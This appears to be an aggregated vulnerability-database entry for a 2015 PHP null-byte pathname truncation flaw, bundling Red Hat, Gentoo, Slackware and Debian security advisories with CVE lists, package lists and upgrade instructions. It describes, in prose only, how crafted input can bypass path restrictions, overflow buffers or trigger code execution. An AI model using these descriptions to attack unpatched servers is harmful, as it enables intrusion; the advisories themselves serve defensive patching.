php-5.4.41-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz\n\nSlackware x86_64 -current package:\nae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg php-5.4.41-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-4024\n\n Denial of service when processing multipart/form-data requests. \n\nCVE-2015-4022\n\n Integer overflow in the ftp_genlist() function may result in\n denial of service or potentially the execution of arbitrary code. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1. \n\nWe recommend that you upgrade your php5 packages",
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VAR-201506-0267
Vulnerability from variot - Updated: 2026-04-10 22:22PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. PHP is prone to multiple security-bypass vulnerabilities. An attacker can leverage these issues to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language supports multiple grammars, multiple databases and operating systems, and supports C and C++ for program expansion. A security vulnerability exists in PHP due to the program truncating pathnames when it encounters '\x00' bytes. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: php55-php security update Advisory ID: RHSA-2015:1186-01 Product: Red Hat Software Collections Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1186.html Issue date: 2015-06-25 CVE Names: CVE-2015-2783 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4598 CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 CVE-2015-4605 =====================================================================
- Summary:
Updated php55-php packages that fix multiple security issues are now available for Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.
A flaw was found in the way the PHP module for the Apache httpd web server handled pipelined requests. A remote attacker could use this flaw to trigger the execution of a PHP script in a deinitialized interpreter, causing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022)
Multiple flaws were discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4602, CVE-2015-4603)
It was found that certain PHP functions did not properly handle file names containing a NULL character. (CVE-2015-4025, CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)
Multiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)
Multiple flaws were found in PHP's File Information (fileinfo) extension. A remote attacker could cause a PHP application to crash if it used fileinfo to identify type of attacker supplied files. (CVE-2015-4604, CVE-2015-4605)
All php55-php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd24-httpd service must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4 1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions 1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo 1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing 1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode() 1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS 1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+ 1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing 1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character 1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name 1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata() 1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions 1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions 1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize 1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source: php55-php-5.5.21-4.el6.src.rpm
x86_64: php55-php-5.5.21-4.el6.x86_64.rpm php55-php-bcmath-5.5.21-4.el6.x86_64.rpm php55-php-cli-5.5.21-4.el6.x86_64.rpm php55-php-common-5.5.21-4.el6.x86_64.rpm php55-php-dba-5.5.21-4.el6.x86_64.rpm php55-php-debuginfo-5.5.21-4.el6.x86_64.rpm php55-php-devel-5.5.21-4.el6.x86_64.rpm php55-php-enchant-5.5.21-4.el6.x86_64.rpm php55-php-fpm-5.5.21-4.el6.x86_64.rpm php55-php-gd-5.5.21-4.el6.x86_64.rpm php55-php-gmp-5.5.21-4.el6.x86_64.rpm php55-php-imap-5.5.21-4.el6.x86_64.rpm php55-php-intl-5.5.21-4.el6.x86_64.rpm php55-php-ldap-5.5.21-4.el6.x86_64.rpm php55-php-mbstring-5.5.21-4.el6.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm php55-php-odbc-5.5.21-4.el6.x86_64.rpm php55-php-opcache-5.5.21-4.el6.x86_64.rpm php55-php-pdo-5.5.21-4.el6.x86_64.rpm php55-php-pgsql-5.5.21-4.el6.x86_64.rpm php55-php-process-5.5.21-4.el6.x86_64.rpm php55-php-pspell-5.5.21-4.el6.x86_64.rpm php55-php-recode-5.5.21-4.el6.x86_64.rpm php55-php-snmp-5.5.21-4.el6.x86_64.rpm php55-php-soap-5.5.21-4.el6.x86_64.rpm php55-php-tidy-5.5.21-4.el6.x86_64.rpm php55-php-xml-5.5.21-4.el6.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source: php55-php-5.5.21-4.el6.src.rpm
x86_64: php55-php-5.5.21-4.el6.x86_64.rpm php55-php-bcmath-5.5.21-4.el6.x86_64.rpm php55-php-cli-5.5.21-4.el6.x86_64.rpm php55-php-common-5.5.21-4.el6.x86_64.rpm php55-php-dba-5.5.21-4.el6.x86_64.rpm php55-php-debuginfo-5.5.21-4.el6.x86_64.rpm php55-php-devel-5.5.21-4.el6.x86_64.rpm php55-php-enchant-5.5.21-4.el6.x86_64.rpm php55-php-fpm-5.5.21-4.el6.x86_64.rpm php55-php-gd-5.5.21-4.el6.x86_64.rpm php55-php-gmp-5.5.21-4.el6.x86_64.rpm php55-php-imap-5.5.21-4.el6.x86_64.rpm php55-php-intl-5.5.21-4.el6.x86_64.rpm php55-php-ldap-5.5.21-4.el6.x86_64.rpm php55-php-mbstring-5.5.21-4.el6.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm php55-php-odbc-5.5.21-4.el6.x86_64.rpm php55-php-opcache-5.5.21-4.el6.x86_64.rpm php55-php-pdo-5.5.21-4.el6.x86_64.rpm php55-php-pgsql-5.5.21-4.el6.x86_64.rpm php55-php-process-5.5.21-4.el6.x86_64.rpm php55-php-pspell-5.5.21-4.el6.x86_64.rpm php55-php-recode-5.5.21-4.el6.x86_64.rpm php55-php-snmp-5.5.21-4.el6.x86_64.rpm php55-php-soap-5.5.21-4.el6.x86_64.rpm php55-php-tidy-5.5.21-4.el6.x86_64.rpm php55-php-xml-5.5.21-4.el6.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source: php55-php-5.5.21-4.el6.src.rpm
x86_64: php55-php-5.5.21-4.el6.x86_64.rpm php55-php-bcmath-5.5.21-4.el6.x86_64.rpm php55-php-cli-5.5.21-4.el6.x86_64.rpm php55-php-common-5.5.21-4.el6.x86_64.rpm php55-php-dba-5.5.21-4.el6.x86_64.rpm php55-php-debuginfo-5.5.21-4.el6.x86_64.rpm php55-php-devel-5.5.21-4.el6.x86_64.rpm php55-php-enchant-5.5.21-4.el6.x86_64.rpm php55-php-fpm-5.5.21-4.el6.x86_64.rpm php55-php-gd-5.5.21-4.el6.x86_64.rpm php55-php-gmp-5.5.21-4.el6.x86_64.rpm php55-php-imap-5.5.21-4.el6.x86_64.rpm php55-php-intl-5.5.21-4.el6.x86_64.rpm php55-php-ldap-5.5.21-4.el6.x86_64.rpm php55-php-mbstring-5.5.21-4.el6.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm php55-php-odbc-5.5.21-4.el6.x86_64.rpm php55-php-opcache-5.5.21-4.el6.x86_64.rpm php55-php-pdo-5.5.21-4.el6.x86_64.rpm php55-php-pgsql-5.5.21-4.el6.x86_64.rpm php55-php-process-5.5.21-4.el6.x86_64.rpm php55-php-pspell-5.5.21-4.el6.x86_64.rpm php55-php-recode-5.5.21-4.el6.x86_64.rpm php55-php-snmp-5.5.21-4.el6.x86_64.rpm php55-php-soap-5.5.21-4.el6.x86_64.rpm php55-php-tidy-5.5.21-4.el6.x86_64.rpm php55-php-xml-5.5.21-4.el6.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source: php55-php-5.5.21-4.el6.src.rpm
x86_64: php55-php-5.5.21-4.el6.x86_64.rpm php55-php-bcmath-5.5.21-4.el6.x86_64.rpm php55-php-cli-5.5.21-4.el6.x86_64.rpm php55-php-common-5.5.21-4.el6.x86_64.rpm php55-php-dba-5.5.21-4.el6.x86_64.rpm php55-php-debuginfo-5.5.21-4.el6.x86_64.rpm php55-php-devel-5.5.21-4.el6.x86_64.rpm php55-php-enchant-5.5.21-4.el6.x86_64.rpm php55-php-fpm-5.5.21-4.el6.x86_64.rpm php55-php-gd-5.5.21-4.el6.x86_64.rpm php55-php-gmp-5.5.21-4.el6.x86_64.rpm php55-php-imap-5.5.21-4.el6.x86_64.rpm php55-php-intl-5.5.21-4.el6.x86_64.rpm php55-php-ldap-5.5.21-4.el6.x86_64.rpm php55-php-mbstring-5.5.21-4.el6.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el6.x86_64.rpm php55-php-odbc-5.5.21-4.el6.x86_64.rpm php55-php-opcache-5.5.21-4.el6.x86_64.rpm php55-php-pdo-5.5.21-4.el6.x86_64.rpm php55-php-pgsql-5.5.21-4.el6.x86_64.rpm php55-php-process-5.5.21-4.el6.x86_64.rpm php55-php-pspell-5.5.21-4.el6.x86_64.rpm php55-php-recode-5.5.21-4.el6.x86_64.rpm php55-php-snmp-5.5.21-4.el6.x86_64.rpm php55-php-soap-5.5.21-4.el6.x86_64.rpm php55-php-tidy-5.5.21-4.el6.x86_64.rpm php55-php-xml-5.5.21-4.el6.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: php55-php-5.5.21-4.el7.src.rpm
x86_64: php55-php-5.5.21-4.el7.x86_64.rpm php55-php-bcmath-5.5.21-4.el7.x86_64.rpm php55-php-cli-5.5.21-4.el7.x86_64.rpm php55-php-common-5.5.21-4.el7.x86_64.rpm php55-php-dba-5.5.21-4.el7.x86_64.rpm php55-php-debuginfo-5.5.21-4.el7.x86_64.rpm php55-php-devel-5.5.21-4.el7.x86_64.rpm php55-php-enchant-5.5.21-4.el7.x86_64.rpm php55-php-fpm-5.5.21-4.el7.x86_64.rpm php55-php-gd-5.5.21-4.el7.x86_64.rpm php55-php-gmp-5.5.21-4.el7.x86_64.rpm php55-php-intl-5.5.21-4.el7.x86_64.rpm php55-php-ldap-5.5.21-4.el7.x86_64.rpm php55-php-mbstring-5.5.21-4.el7.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm php55-php-odbc-5.5.21-4.el7.x86_64.rpm php55-php-opcache-5.5.21-4.el7.x86_64.rpm php55-php-pdo-5.5.21-4.el7.x86_64.rpm php55-php-pgsql-5.5.21-4.el7.x86_64.rpm php55-php-process-5.5.21-4.el7.x86_64.rpm php55-php-pspell-5.5.21-4.el7.x86_64.rpm php55-php-recode-5.5.21-4.el7.x86_64.rpm php55-php-snmp-5.5.21-4.el7.x86_64.rpm php55-php-soap-5.5.21-4.el7.x86_64.rpm php55-php-xml-5.5.21-4.el7.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):
Source: php55-php-5.5.21-4.el7.src.rpm
x86_64: php55-php-5.5.21-4.el7.x86_64.rpm php55-php-bcmath-5.5.21-4.el7.x86_64.rpm php55-php-cli-5.5.21-4.el7.x86_64.rpm php55-php-common-5.5.21-4.el7.x86_64.rpm php55-php-dba-5.5.21-4.el7.x86_64.rpm php55-php-debuginfo-5.5.21-4.el7.x86_64.rpm php55-php-devel-5.5.21-4.el7.x86_64.rpm php55-php-enchant-5.5.21-4.el7.x86_64.rpm php55-php-fpm-5.5.21-4.el7.x86_64.rpm php55-php-gd-5.5.21-4.el7.x86_64.rpm php55-php-gmp-5.5.21-4.el7.x86_64.rpm php55-php-intl-5.5.21-4.el7.x86_64.rpm php55-php-ldap-5.5.21-4.el7.x86_64.rpm php55-php-mbstring-5.5.21-4.el7.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm php55-php-odbc-5.5.21-4.el7.x86_64.rpm php55-php-opcache-5.5.21-4.el7.x86_64.rpm php55-php-pdo-5.5.21-4.el7.x86_64.rpm php55-php-pgsql-5.5.21-4.el7.x86_64.rpm php55-php-process-5.5.21-4.el7.x86_64.rpm php55-php-pspell-5.5.21-4.el7.x86_64.rpm php55-php-recode-5.5.21-4.el7.x86_64.rpm php55-php-snmp-5.5.21-4.el7.x86_64.rpm php55-php-soap-5.5.21-4.el7.x86_64.rpm php55-php-xml-5.5.21-4.el7.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: php55-php-5.5.21-4.el7.src.rpm
x86_64: php55-php-5.5.21-4.el7.x86_64.rpm php55-php-bcmath-5.5.21-4.el7.x86_64.rpm php55-php-cli-5.5.21-4.el7.x86_64.rpm php55-php-common-5.5.21-4.el7.x86_64.rpm php55-php-dba-5.5.21-4.el7.x86_64.rpm php55-php-debuginfo-5.5.21-4.el7.x86_64.rpm php55-php-devel-5.5.21-4.el7.x86_64.rpm php55-php-enchant-5.5.21-4.el7.x86_64.rpm php55-php-fpm-5.5.21-4.el7.x86_64.rpm php55-php-gd-5.5.21-4.el7.x86_64.rpm php55-php-gmp-5.5.21-4.el7.x86_64.rpm php55-php-intl-5.5.21-4.el7.x86_64.rpm php55-php-ldap-5.5.21-4.el7.x86_64.rpm php55-php-mbstring-5.5.21-4.el7.x86_64.rpm php55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm php55-php-odbc-5.5.21-4.el7.x86_64.rpm php55-php-opcache-5.5.21-4.el7.x86_64.rpm php55-php-pdo-5.5.21-4.el7.x86_64.rpm php55-php-pgsql-5.5.21-4.el7.x86_64.rpm php55-php-process-5.5.21-4.el7.x86_64.rpm php55-php-pspell-5.5.21-4.el7.x86_64.rpm php55-php-recode-5.5.21-4.el7.x86_64.rpm php55-php-snmp-5.5.21-4.el7.x86_64.rpm php55-php-soap-5.5.21-4.el7.x86_64.rpm php55-php-xml-5.5.21-4.el7.x86_64.rpm php55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-2783 https://access.redhat.com/security/cve/CVE-2015-3307 https://access.redhat.com/security/cve/CVE-2015-3329 https://access.redhat.com/security/cve/CVE-2015-3330 https://access.redhat.com/security/cve/CVE-2015-3411 https://access.redhat.com/security/cve/CVE-2015-3412 https://access.redhat.com/security/cve/CVE-2015-4021 https://access.redhat.com/security/cve/CVE-2015-4022 https://access.redhat.com/security/cve/CVE-2015-4024 https://access.redhat.com/security/cve/CVE-2015-4025 https://access.redhat.com/security/cve/CVE-2015-4026 https://access.redhat.com/security/cve/CVE-2015-4598 https://access.redhat.com/security/cve/CVE-2015-4602 https://access.redhat.com/security/cve/CVE-2015-4603 https://access.redhat.com/security/cve/CVE-2015-4604 https://access.redhat.com/security/cve/CVE-2015-4605 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFVi8HYXlSAg2UNWIIRAiyPAJ99IZMPIkUJWe8WmApDpEGV6ff98wCgxBYL TtBX6SWqx78H/4bsQXtRlo4= =EuyB -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201606-10
https://security.gentoo.org/
Severity: Normal Title: PHP: Multiple vulnerabilities Date: June 19, 2016 Bugs: #537586, #541098, #544186, #544330, #546872, #549538, #552408, #555576, #555830, #556952, #559612, #562882, #571254, #573892, #577376 ID: 201606-10
Synopsis
Multiple vulnerabilities have been found in PHP, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition.
Background
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP 5.4 is now masked in Portage:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
[ 1 ] CVE-2013-6501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501 [ 2 ] CVE-2014-9705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705 [ 3 ] CVE-2014-9709 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709 [ 4 ] CVE-2015-0231 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231 [ 5 ] CVE-2015-0273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273 [ 6 ] CVE-2015-1351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351 [ 7 ] CVE-2015-1352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352 [ 8 ] CVE-2015-2301 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301 [ 9 ] CVE-2015-2348 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348 [ 10 ] CVE-2015-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783 [ 11 ] CVE-2015-2787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787 [ 12 ] CVE-2015-3329 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329 [ 13 ] CVE-2015-3330 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330 [ 14 ] CVE-2015-4021 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021 [ 15 ] CVE-2015-4022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022 [ 16 ] CVE-2015-4025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025 [ 17 ] CVE-2015-4026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026 [ 18 ] CVE-2015-4147 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147 [ 19 ] CVE-2015-4148 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148 [ 20 ] CVE-2015-4642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642 [ 21 ] CVE-2015-4643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643 [ 22 ] CVE-2015-4644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644 [ 23 ] CVE-2015-6831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831 [ 24 ] CVE-2015-6832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832 [ 25 ] CVE-2015-6833 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833 [ 26 ] CVE-2015-6834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834 [ 27 ] CVE-2015-6835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835 [ 28 ] CVE-2015-6836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836 [ 29 ] CVE-2015-6837 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837 [ 30 ] CVE-2015-6838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838 [ 31 ] CVE-2015-7803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803 [ 32 ] CVE-2015-7804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: 5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz
Slackware 14.1 package: 52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz
Slackware -current package: e1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz
Slackware x86_64 -current package: ae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg php-5.4.41-i486-1_slack14.1.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-4024
Denial of service when processing multipart/form-data requests.
For the oldstable distribution (wheezy), these problems have been fixed in version 5.4.41-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in version 5.6.9+dfsg-0+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 5.6.9+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 5.6.9+dfsg-1.
We recommend that you upgrade your php5 packages
Show details on source website{
"affected_products": {
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"data": [
{
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"model": "php",
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{
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{
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{
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{
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{
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{
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{
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"data": "PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. PHP is prone to multiple security-bypass vulnerabilities. \nAn attacker can leverage these issues to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language supports multiple grammars, multiple databases and operating systems, and supports C and C++ for program expansion. A security vulnerability exists in PHP due to the program truncating pathnames when it encounters \u0027\\x00\u0027 bytes. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: php55-php security update\nAdvisory ID: RHSA-2015:1186-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1186.html\nIssue date: 2015-06-25\nCVE Names: CVE-2015-2783 CVE-2015-3307 CVE-2015-3329 \n CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 \n CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 \n CVE-2015-4025 CVE-2015-4026 CVE-2015-4598 \n CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 \n CVE-2015-4605 \n=====================================================================\n\n1. Summary:\n\nUpdated php55-php packages that fix multiple security issues are now\navailable for 